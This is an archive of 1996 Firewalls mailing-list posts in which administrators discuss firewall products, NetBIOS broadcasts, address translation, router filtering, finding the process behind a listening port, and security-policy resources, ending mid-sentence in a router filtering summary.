1996 17:13:21 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB691B.1D403040@rwcooper.rc.toronto.on.ca> From: Russ To: "'Firewalls@GreatCircle.COM'" Subject: RE: Catapault firewall Date: Wed, 3 Jul 1996 20:06:24 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [rant] Art's message about networkMCI WebMaker was the first time I'd heard of the product. See, I work for MCI, actually, SHL who is owned by MCI. Actually, I am the National Coordinator for the regional Internet/Intranet Professional Services groups here in Canada (at least that's the title they've given me). Unfortunately, my position doesn't mean squat to corporate MCI. Third party Firewall developers have asked me for my opinion on their products, but the company I work for doesn't know I exist (presumably). For Christ's sake, the damn thing even uses NT at its core...;-[...like I might know a thing or two about NT...;-[ ...Anyone wonder why I'm looking for new digs??? (p.s. has to be in Canada) [/rant] For a more detailed product of networkMCI WebMaker, have a look at; http://www.webmaker.mci.com/webmaker/features/secbrf.htm which has some technical information about the security design of the WebMaker product. It isn't simply NT running on a Pentium Pro. The box includes a "Router on an ISA card", which is a packet-filtering router which only allows packets through on tcp 80/443/25, tcp 21 (outbound only), and port 1023 for established client connections. It also allows udp 53 for DNS. With these ports only, its impossible to get to NT's server components like RPC or NetBIOS from the Internet, so issues like remotely accessing its registry or logging into the server are pretty much out of the question. Access to the box from the LAN is restricted by the Intel Proxy Server which supposedly only understands HTTP. Depending on how that's been implemented, it may still be possible to access the NT Workstation's registry from the LAN. This "Router on a card" has its own Ethernet port, and uses a management application that speaks directly to it, not to NT. IP Forwarding is turned off in NT, and two additional ethernet adapters are in the box. One connects to the ethernet port on the "Router on a card" using a cross-over cable to establish connectivity to the Internet, the other connects to the Internal network. The Proxy Server is from Intel??, and they say it will only allow outbound HTTP requests (which sorta contradicts the statement about FTP being allowed for outbound only??). It proxies the requests and therefore does not use the internal IP addresses. All the marketing tripe to one-side, this is a nice piece of hardware. So while the software being used would need to be evaluated to determine if its safe or not, the concept is pretty sound and the implementation seems to adhere to the design principle. [megarant] Either way, its another example of how my parent company wants to put me out of a job, embarrass me in public, and in general, ignore their hired guns in lieu of *unknown* (to me). Maybe they figured that since the WebMaker will only be available in the U.S. they didn't need the opinion of a Canadian. Obviously nobody from MCI (other than me) reads this list. Do I sound bitter?...naw...;-] [/megarant] Cheers, Russ From firewalls-owner Wed Jul 3 18:04:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA15788 for firewalls-outgoing; Wed, 3 Jul 1996 17:43:02 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA15768 for ; Wed, 3 Jul 1996 17:42:53 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB691F.3F836920@rwcooper.rc.toronto.on.ca> From: Russ To: "Firewalls@GreatCircle.COM" Subject: RE: udp 137 broadcast from Win95 PC Date: Wed, 3 Jul 1996 20:35:58 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The UDP 137 packets from your Win95 machine is the machine announcing itself to the network in an attempt to determine who is the NetBIOS Browse Master for that network. In the event it cannot find one, it will become the Browse Master itself. I would suspect that your packets came about simultaneous to reboots or power-ups, which you could confirm by monitoring a power-up sequence and seeing how many packets it generates. You can turn off this capability, thereby forcing it not to attempt to become a Browse Master by going to Control Panel, Networks, File and Printer Sharing for Microsoft Networks, Properties, Browse Master = No. Make sure you have applied Service Pack #1 for Windows 95 to an Internet exposed Windows 95 machine that has File and Print Sharing enabled. Cheers, Russ From firewalls-owner Wed Jul 3 19:07:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA22965 for firewalls-outgoing; Wed, 3 Jul 1996 19:00:49 -0700 (PDT) Received: from ns.isk.co.kr ([203.240.169.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA22947 for ; Wed, 3 Jul 1996 19:00:38 -0700 (PDT) Received: from isk82.isk.co.kr (isk82.isk.co.kr [203.240.169.82]) by ns.isk.co.kr (8.6.12H1/8.6.12) with SMTP id KAA03666 for ; Thu, 4 Jul 1996 10:57:55 +0900 Message-ID: <31DB2515.3A83@isk.co.kr> Date: Thu, 04 Jul 1996 10:57:41 +0900 From: "Kwanho Shin(=?EUC-KR?B?vcWw/Mij?=)" Organization: Internet Security Korea X-Mailer: Mozilla 3.0b4 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: IP address translation Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk when i set the Firewall-1(Checkpoint), i met some problem. First is how I can setup for IP translation(inbound & outbound) I set route, arp for illegal IP & grobal IP. But i can translate IP address(Illegal --> Grobal, Grobal --> Illegal) If you've been set above it, to send information, please. Have a nice Day!! -- Kwanho Shin (HL1MLV) Mailto: skh@isk.co.kr Internet Security Korea Co., Ltd. Tel:(02)786-3555 Fax:(02)786-3554 From firewalls-owner Wed Jul 3 19:21:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA23110 for firewalls-outgoing; Wed, 3 Jul 1996 19:04:42 -0700 (PDT) Received: from pdx1 (pdx1.world.net [192.243.32.18]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA23098 for ; Wed, 3 Jul 1996 19:04:34 -0700 (PDT) Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1 (8.6.9/8.6.9) with ESMTP id TAA08601 for ; Wed, 3 Jul 1996 19:03:07 -0700 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id MAA14738 for firewalls@greatcircle.com; Thu, 4 Jul 1996 12:01:07 +1000 Received: from applejack.CS.YALE.EDU (APPLEJACK.CS.YALE.EDU [128.36.0.131]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id EAA28051 for ; Thu, 4 Jul 1996 04:11:41 +1000 Received: from eli.CS.YALE.EDU by applejack.CS.YALE.EDU (8.7.1/res.host.cf-4.0) Received: by eli.CS.YALE.EDU id KAA16403; Wed, 3 Jul 1996 10:32:33 -0400 (EDT) sender owner-sneakers@CS.YALE.EDU for sneakers-outgoing Received: from bulldog.CS.YALE.EDU by eli.CS.YALE.EDU (8.7.1/res.host.bitnet.cf-4.1) Received: from relay1.smtp.psi.net by bulldog.CS.YALE.EDU (8.7.1/res.host.uucp.cf-4.1) Received: from uu6.psi.com by relay1.smtp.psi.net (8.6.12/SMI-5.4-PSI) Received: from larry.dcbnet.com by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; Received: from jmccain.dcbnet.com (mccain [205.166.54.68]) by larry.dcbnet.com (8.6.12/8.6.12) with SMTP id JAA18448 for ; Wed, 3 Jul 1996 09:30:54 -0500 Message-Id: <199607031430.JAA18448@larry.dcbnet.com> X-Sender: jmccain@dcbnet.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 Jul 1996 09:37:05 -0500 To: sneakers@CS.YALE.EDU From: jmccain@dcbnet.com (John McCain) Subject: Iphone vulnerabilities Sender: firewalls-owner@GreatCircle.COM Precedence: bulk One of my clients came up with this today. Anyone else run into Iphone security problems? The situation. He's connected ppp to an ISP on a dial-up line.His comments... Today I was connected to the net, and my i-phone rang. Someone said they where testing their i-net phone. I told them they sounded ok, and they said "just a minute". Seconds later I noticed my i-phone software was flashing something. (Don't remember the initials now but it was three letters toward the bottom left of the screen. Not knowing, I disconnected. Later I ran netscape and found my bookmark.htm file has been drastically changed. I wonder if they were trying to download some files in hope of getting financial stuff, etc. (I don't have on laptop). Anyway, I don't think I care for I-phone now Regards, John From firewalls-owner Wed Jul 3 19:38:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA24984 for firewalls-outgoing; Wed, 3 Jul 1996 19:33:19 -0700 (PDT) Received: from gatekeeper.qualix.com (gatekeeper.qualix.com [192.91.182.105]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA24977 for ; Wed, 3 Jul 1996 19:33:12 -0700 (PDT) Received: from qualix.qualix by gatekeeper.qualix.com (8.6.9/Q940531.1) Received: from qualix20.qualix by qualix.qualix (4.1/SMI-4.1-Q931113.1) Received: from spirit.qualix by qualix20.qualix (SMI-8.6/SMI-SVR4) Received: by spirit.qualix (5.x/SMI-SVR4) From: security@qualix.com (Nik I. Knoth) Message-Id: <9607040226.AA17040@spirit.qualix> Subject: Re: Hardware requirements of Firewall-1 To: baysalc@boun.edu.tr (Can BAYSAL) Date: Wed, 3 Jul 1996 19:26:55 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Can BAYSAL" at Jun 30, 96 03:08:07 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It does, in fact, work on an IPX. I have a customer who is protecting his internal net with FW-1 on a sparc IPX... To answer yours, yes a sparc 5 would prob be quite sufficient. CP's FW-1 is not terribly resource- intensive. -nik -- /\/ik I. / > Hi there; > I wonder what is the REAL minimum required configuration of > Firewall-1. The book says that Sun SPARC based system, I do not think > this means IPX :) , does it? For example on a 10 Mbits ethernet would a > Sparc 5 be acceptable? > > Thanks; > Can Baysal > From firewalls-owner Wed Jul 3 20:05:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA27725 for firewalls-outgoing; Wed, 3 Jul 1996 19:50:42 -0700 (PDT) Received: from news.tcd.net (news.tcd.net [198.70.50.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA27696 for ; Wed, 3 Jul 1996 19:50:33 -0700 (PDT) Received: from main.tcd.net (root@main.tcd.net [198.70.50.4]) by news.tcd.net (8.6.12/8.6.9) with ESMTP id UAA07630 for ; Wed, 3 Jul 1996 20:47:54 -0600 Received: from LOCALNAME (slip13.slc.tcd.net [204.248.105.93]) by main.tcd.net (8.7.5/8.7.5) with SMTP id UAA05591 for ; Wed, 3 Jul 1996 20:47:52 -0600 Date: Wed, 3 Jul 1996 20:47:52 -0600 Message-Id: <199607040247.UAA05591@main.tcd.net> X-Sender: pate19@mail.tcd.net X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: PatrickEyler Subject: RE: Training??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:33 AM 7/3/96 MDT, you wrote: >Learning Tree was mentioned as a possible place for training. I found >their web site: http://www.learningtree.com > >Gives details on everything from classes offered to when they take place >and tuition rates. > >Scott > > > You might also look at http://www.arg.com -pat From firewalls-owner Wed Jul 3 22:49:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA08886 for firewalls-outgoing; Wed, 3 Jul 1996 22:38:54 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id WAA08879 for ; Wed, 3 Jul 1996 22:38:48 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607040536.AA09660@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: "Kwanho Shin(=?EUC-KR?B?vcWw/Mij?=)" Cc: Firewalls From: Ryan.Russell/SYBASE Date: 3 Jul 96 22:37:16 EDT Subject: Re: IP translation X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You configure the translation via the fwxlconf program. I think the address translation was introduced in version 2. What specific trouble are you having? Ryan ---------- Previous Message ---------- To: Firewalls cc: From: skh @ isk.co.kr ("Kwanho Shin(=?EUC-KR?B?vcWw/Mij?=)") @ smtp Date: 07/04/96 09:10:23 AM Subject: IP translation when i set the Firewall-1(Checkpoint), i met some problem. First is how I can setup for IP translation(inbound & outbound) I set route, arp for illegal IP & grobal IP. But i can translate IP address(Illegal --> Grobal, Grobal --> Illegal) -- Kwanho Shin (HL1MLV) Mailto: skh@isk.co.kr Internet Security Korea Co., Ltd. Tel:(02)786-3555 Fax:(02)786-3554 From firewalls-owner Wed Jul 3 23:22:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA10452 for firewalls-outgoing; Wed, 3 Jul 1996 23:11:54 -0700 (PDT) Received: from firewall.ddeorg.soft.net (firewall.ddeorg.soft.net [164.164.74.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA10425 for ; Wed, 3 Jul 1996 23:11:25 -0700 (PDT) Received: by firewall.ddeorg.soft.net (5.61/9.3) Received: from orion.ddeorg.soft.net by ddeorg.soft.net (5.61/9.3) with SMTP Received: by orion.ddeorg.soft.net (4.1/9.7) Message-Id: <9607040608.AA08800@orion.ddeorg.soft.net> X-Mailer: exmh version 1.6.6 3/24/96 To: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 04 Jul 1996 06:08:08 +0000 From: "Rajesh K. R." Sender: firewalls-owner@GreatCircle.COM Precedence: bulk How can I configure router to allow some packets to transmit and vise versa? From firewalls-owner Thu Jul 4 00:04:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA13104 for firewalls-outgoing; Wed, 3 Jul 1996 23:57:06 -0700 (PDT) Received: from gemsgw.med.ge.com (gemsgw.med.ge.com [192.88.230.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA13097 for ; Wed, 3 Jul 1996 23:57:00 -0700 (PDT) Received: from gemed.med.ge.com (gemed.med.ge.com [3.7.12.4]) by gemsgw.med.ge.com (8.6.12/8.6.12) with ESMTP id BAA00978; Thu, 4 Jul 1996 01:52:02 -0500 Received: from (meru [3.70.200.55]) by gemed.med.ge.com (8.6.12/8.6.12) with SMTP id BAA10280; Thu, 4 Jul 1996 01:54:22 -0500 From: Sameer - The Terminator Message-Id: <199607040654.BAA10280@gemed.med.ge.com> Received: by meru Subject: Re: your mail To: krr@ddeorg.soft.net (Rajesh K. R.) Date: Thu, 4 Jul 96 12:27:13 IST Cc: firewalls@greatcircle.com In-Reply-To: <9607040608.AA08800@orion.ddeorg.soft.net>; from "Rajesh K. R." at Jul 04, 96 6:08 am Mailer: Elm [revision: 70.85] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, even i am looking for that.Could someone help. Also, I would like to know how to see the logs on router. I am having a cisco router. ...sam > > How can I configure router to allow some packets to transmit and vise > versa? > From firewalls-owner Thu Jul 4 02:49:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA21729 for firewalls-outgoing; Thu, 4 Jul 1996 02:30:58 -0700 (PDT) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA21694 for ; Thu, 4 Jul 1996 02:29:59 -0700 (PDT) Received: from tidtest.total.fr (tidtest.total.fr [146.249.165.73]) by pegase.total.fr (8.6.8/8.6.6) with SMTP id LAA01984; Thu, 4 Jul 1996 11:27:28 +0200 Received: by tidtest.total.fr (4.1/SMI-4.1) Message-Id: <9607040925.AA21474@tidtest.total.fr> To: Sameer - The Terminator Cc: krr@ddeorg.soft.net (Rajesh K. R.), firewalls@greatcircle.com Subject: Re: your mail In-Reply-To: Your message of "Thu, 04 Jul 1996 12:27:13 +0700." X-Cuse: "The dog ate my network" Date: Thu, 04 Jul 1996 11:25:29 +0100 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <199607040654.BAA10280@gemed.med.ge.com>, Sameer - The Terminator wr ites: > Hi, > even i am looking for that.Could someone help. > Also, I would like to know how to see the logs on router. > I am having a cisco router. > ...sam > > > > How can I configure router to allow some packets to transmit and vise > > versa? > > > Ask cisco@spot.colorado.edu. And BTW, this applies to krr's problem only if he has a cisco. Not obvious from his posting ... Michel Lavondes (lavondes@tidtest.total.fr) #include Governments are guilty until proved innocent From firewalls-owner Thu Jul 4 08:19:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA03048 for firewalls-outgoing; Thu, 4 Jul 1996 08:05:12 -0700 (PDT) Received: from Mailer.Uni-Marburg.DE (papin.HRZ.Uni-Marburg.DE [137.248.1.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA03041 for ; Thu, 4 Jul 1996 08:05:05 -0700 (PDT) Received: from sumbi01.med.Uni-Marburg.DE by Mailer.Uni-Marburg.DE (AIX 3.2/UCB 5.64/20.07.94) Received: by med.uni-marburg.de (8.6.12/ADD-HUB-2.1) Received: from post.med.uni-marburg.de(137.248.202.51) by sumbi01.med.uni-marburg.de via smap (V1.3) Received: from pcmbi60.med.uni-marburg.de (pcmbi60.med.uni-marburg.de [137.248.202.60]) by post.med.uni-marburg.de (8.6.11/8.6.9) with SMTP id RAA04321 for ; Thu, 4 Jul 1996 17:10:22 +0200 Message-Id: <199607041510.RAA04321@post.med.uni-marburg.de> Comments: Authenticated sender is From: "D.A. Meyer" To: firewalls@greatcircle.com Date: Thu, 4 Jul 1996 17:06:16 +0000 Subject: port to process Reply-To: meyerd@Mailer.Uni-Marburg.DE X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for a tool which shows me the PID of the process which is responsible for the offering of a TCP/UDP-port. I think i've seen something here on the list but i do not remember the name. The cause is: sometimes i see a port (netstat -an) listening like tcp *.2230 *.* LISTEN or tcp *.1749 *.* LISTEN. I do not know anything about these ports, especially how and when they are started. I'm running fwtk and cern httpd and nothing else (I think). TIA Dirk ----------------------------------------------------------------- Dirk A. Meyer meyerd@mailer.uni-marburg.de Klinikum der Philipps-Universitaet Marburg Tel.xx49-6421-28-6291 Med. Informatik Fax.-------------8921 Bunsenstr. 3 D-35033 Marburg/Lahn ----------------------------------------------------------------- From firewalls-owner Thu Jul 4 09:04:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA05086 for firewalls-outgoing; Thu, 4 Jul 1996 08:47:30 -0700 (PDT) Received: from artemis.rus.uni-stuttgart.de (artemis.rus.uni-stuttgart.de [129.69.18.28]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA05077 for ; Thu, 4 Jul 1996 08:47:21 -0700 (PDT) Received: from info2.rus.uni-stuttgart.de (info2.rus.uni-stuttgart.de [129.69.18.15]) by artemis.rus.uni-stuttgart.de with SMTP id RAA19244 Received: by info2.rus.uni-stuttgart.de (AIX 3.2/UCB 5.64/4.03) Message-Id: <9607041542.AA33993@info2.rus.uni-stuttgart.de> Subject: Re: port to process To: meyerd@Papin.HRZ.Uni-Marburg.DE Date: Thu, 4 Jul 1996 17:42:00 +0200 (MST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199607041510.RAA04321@post.med.uni-marburg.de> from "D.A. Meyer" at Jul 4, 96 05:06:16 pm From: Helmut Springer Organization: Stuttgart University, FRG X-Pgp-Fingerprint: AE 42 C3 2C A1 3E 55 6D B3 AC 3C D2 F3 CF FF E7 X-Phone: +49 711 685-2003q X-Fax: +49 711 685-2043 X-Mailer: ELM [version 2.4 PL25 PGP6] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- hi, D.A. Meyer wrote: > I'm looking for a tool which shows me the PID of the process which is > responsible for the offering of a TCP/UDP-port. I think i've seen lsof (list open filedescriptors) from Vic Abell primary site vic.cc.purdue.edu /pub/tools/unix/lsof current version 3.67 AFAIK. enjoy delta - -- helmut 'delta' springer Unix/Net Consulting, InfoSystems, StudBox delta@RUS.Uni-Stuttgart.DE Stuttgart University, FRG http://home.pages.de/~delta/ phone : +49 711 685-2003 If you've got to do it, FAX : +49 711 685-2043 do it with cold blood... -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBMdvmQUIBUTWGT7StAQHWoAP/Q9PW7Bp8xx8VJvgYTYKNu7WoLfeUUNMR UXI3OIcMoZij8A84LquDPLD9h/nJXmqqNS9FKxgVFkBfceUSNfInTP+xLeQUYJeF nNZkznPtRyK0AYT4xwa8cAmi1354cyVaBtNK2g7nR5Zj/2lV5dSLsTkop1fRVyrO raOLpB0FFgg= =h7Pn -----END PGP SIGNATURE----- From firewalls-owner Thu Jul 4 09:19:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA06146 for firewalls-outgoing; Thu, 4 Jul 1996 09:10:19 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA06139 for ; Thu, 4 Jul 1996 09:10:13 -0700 (PDT) From: ken@bridge.com Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id LAA20770; Thu, 4 Jul 1996 11:00:25 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA20236 Received: (from ken@localhost) by ernie.bridge.com (8.7.5/8.7.3) id LAA04245; Thu, 4 Jul 1996 11:00:45 -0500 (CDT) Date: Thu, 4 Jul 1996 11:00:45 -0500 (CDT) Message-Id: <199607041600.LAA04245@ernie.bridge.com> To: meyerd@Papin.HRZ.Uni-Marburg.DE Subject: Re: port to process Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: "D.A. Meyer" >I'm looking for a tool which shows me the PID of the process which is >responsible for the offering of a TCP/UDP-port. I think i've seen >something here on the list but i do not remember the name. You're looking for "lsof". It's available at http://wuarchive.wustl.edu/packages/security/lsof/ among other places. - KH From firewalls-owner Thu Jul 4 14:49:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19734 for firewalls-outgoing; Thu, 4 Jul 1996 14:39:28 -0700 (PDT) Received: from diane.inforamp.net (Diane.InfoRamp.Net [198.53.144.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA19727 for ; Thu, 4 Jul 1996 14:39:22 -0700 (PDT) Received: from genel.inforamp.net (mpngate5.ny.us.ibm.com [198.133.29.22]) by diane.inforamp.net (8.7/8.7) with SMTP id RAA29068; Thu, 4 Jul 1996 17:36:39 -0400 (EDT) Received: by genel.inforamp.net with Microsoft Mail Message-ID: <01BB69CE.AF2D9480@genel.inforamp.net> From: Gene Lee To: "firewalls@GreatCircle.COM" Subject: RE: OS/2 firewalls? Date: Thu, 4 Jul 1996 17:31:49 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Check out Netguard at: http://www.netguard.com FW for both NT and OS/2 platforms. -- Gene Lee genel@inforamp.net genelee@vnet.ibm.com ---------- From: Uldis Bojars[SMTP:uldis@lda.gov.lv] Sent: Wednesday, July 03, 1996 4:21 AM To: firewalls@GreatCircle.COM Subject: OS/2 firewalls? Hi! I am searching for OS/2 firewalls - are there any? It's very hard to find, but I think there are some. Of course I do not want OS/2 because I want to use firewall as a workstation ;-) And - if negative - what are good firewalls for freeBSD? Our company is not so big to buy Sun or HP UNiX computer and use it as a firewall. Uldis =BE If you learn from mistakes, you will learn a lot today. --- GoldED/386 3.00.Alpha1+ From firewalls-owner Thu Jul 4 15:19:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA22221 for firewalls-outgoing; Thu, 4 Jul 1996 15:11:53 -0700 (PDT) Received: from mail.enterprise.net (mail.enterprise.net [194.72.192.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA22214 for ; Thu, 4 Jul 1996 15:11:47 -0700 (PDT) Received: from escom-p100 (max02-115.enterprise.net [194.72.197.115]) by mail.enterprise.net (8.6.12/8.6.12) with SMTP id XAA04678 for ; Thu, 4 Jul 1996 23:20:10 GMT Message-Id: <2.2.32.19960704220855.0068c0fc@mail.enterprise.net> X-Sender: jiffi@mail.enterprise.net X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 04 Jul 1996 23:08:55 +0100 To: firewalls@greatcircle.com From: Craig Wood Subject: Security Policy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm in the process of putting together a Security Policy for my organisation. This policy will cover firewalls, as well as general network security in a mixed NetWare/IPX and NT/IP environment. I have manmaged to get hold of NCSA's Firewall Policy Guide, but I was wondering if anyone would point me to any other resources on the Net that would help me. Whilst I appreciate that much of a security policy is organisation specific I'm all in favour of not re-inventing the wheel and utilising general rules as a basis for the polciy. If anyone can help, I'd be most greatful. Thanks and Regards, Craig From firewalls-owner Thu Jul 4 16:19:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA25411 for firewalls-outgoing; Thu, 4 Jul 1996 16:14:30 -0700 (PDT) Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id QAA25404 for ; Thu, 4 Jul 1996 16:14:25 -0700 (PDT) Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id QAA00232; Thu, 4 Jul 1996 16:11:33 -0700 Date: Thu, 4 Jul 1996 16:11:33 -0700 (PDT) From: Robert Hanson To: Craig Wood cc: firewalls@GreatCircle.COM Subject: Re: Security Policy In-Reply-To: <2.2.32.19960704220855.0068c0fc@mail.enterprise.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk being new to this list... i figurered i would offer... www.cert.org the place i found the reference to this list... i have quite a lot of special hardwares and figured it was time to get more into mainstream firewall/filtering procedures for security and reduced router/lan traffics... thanks ---> Robert H. Hanson LAN/WAN Consultant - Internet Service Provider Otis Orchards, Wa. Cutting Edge Communications www.cet.com (509) 927-9541 finger: info@cet.com or email: roberth@cet.com On Thu, 4 Jul 1996, Craig Wood wrote: > I'm in the process of putting together a Security Policy for my > organisation. This policy will cover firewalls, as well as general network > security in a mixed NetWare/IPX and NT/IP environment. I have manmaged to > get hold of NCSA's Firewall Policy Guide, but I was wondering if anyone > would point me to any other resources on the Net that would help me. Whilst > I appreciate that much of a security policy is organisation specific I'm all > in favour of not re-inventing the wheel and utilising general rules as a > basis for the polciy. > > If anyone can help, I'd be most greatful. > > Thanks and Regards, > > Craig > From firewalls-owner Thu Jul 4 19:49:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA01892 for firewalls-outgoing; Thu, 4 Jul 1996 19:35:55 -0700 (PDT) Received: from interlock.mgh.com (interlock.mgh.com [152.159.1.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA01872 for ; Thu, 4 Jul 1996 19:35:46 -0700 (PDT) From: dnewman@mcgraw-hill.com Received: by interlock.mgh.com id AA10017 Message-Id: <199607050233.AA10017@interlock.mgh.com> Received: by interlock.mgh.com (Protected-side Proxy Mail Agent-1); Date: Thu, 04 Jul 96 22:03:24 edt Apparently-To: Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Hi! I am searching for OS/2 firewalls - are there any? Hi Uldis, A company called Netguard Ltd. in Israel supposedly does an OS/2-based firewall. I've never seen it, though, so I can't vouch for it. I think Netguard is at http://www.netguard.com Regards David Newman From firewalls-owner Thu Jul 4 22:04:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA10228 for firewalls-outgoing; Thu, 4 Jul 1996 22:01:54 -0700 (PDT) Received: from nwnexus.wa.com (nwnexus.wa.com [192.135.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id WAA10215 for ; Thu, 4 Jul 1996 22:01:44 -0700 (PDT) Received: by nwnexus.wa.com id AA12704 Received: (from gfm@localhost) by angel.readybox.com (8.6.8/8.6.6) id VAA26650 for firewalls@greatcircle.com; Thu, 4 Jul 1996 21:52:45 -0700 Date: Thu, 4 Jul 1996 21:52:45 -0700 From: Frank McCormick Message-Id: <199607050452.VAA26650@angel.readybox.com> To: firewalls@greatcircle.com Subject: P50 summary Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks: Recently in this list, I posted a pair of questions regarding the filtering capabilities of Ascend's Pipeline 50 router. My questions dealt with how a P50 could be made to recognize and drop source-routed packets. Several of you, including two Ascend employees, were kind enough to respond, both in the list and privately. As is often the case, some answers were partial, while others posed seeming contradictions. No one was actually wrong about anything, but no one seemed to have the whole story, all in one place. In subsequent exchanges with the respondents, I've made an attempt to resolve the competing claims and to come up with a coherent picture of what the P50 actually does. The following is a summary 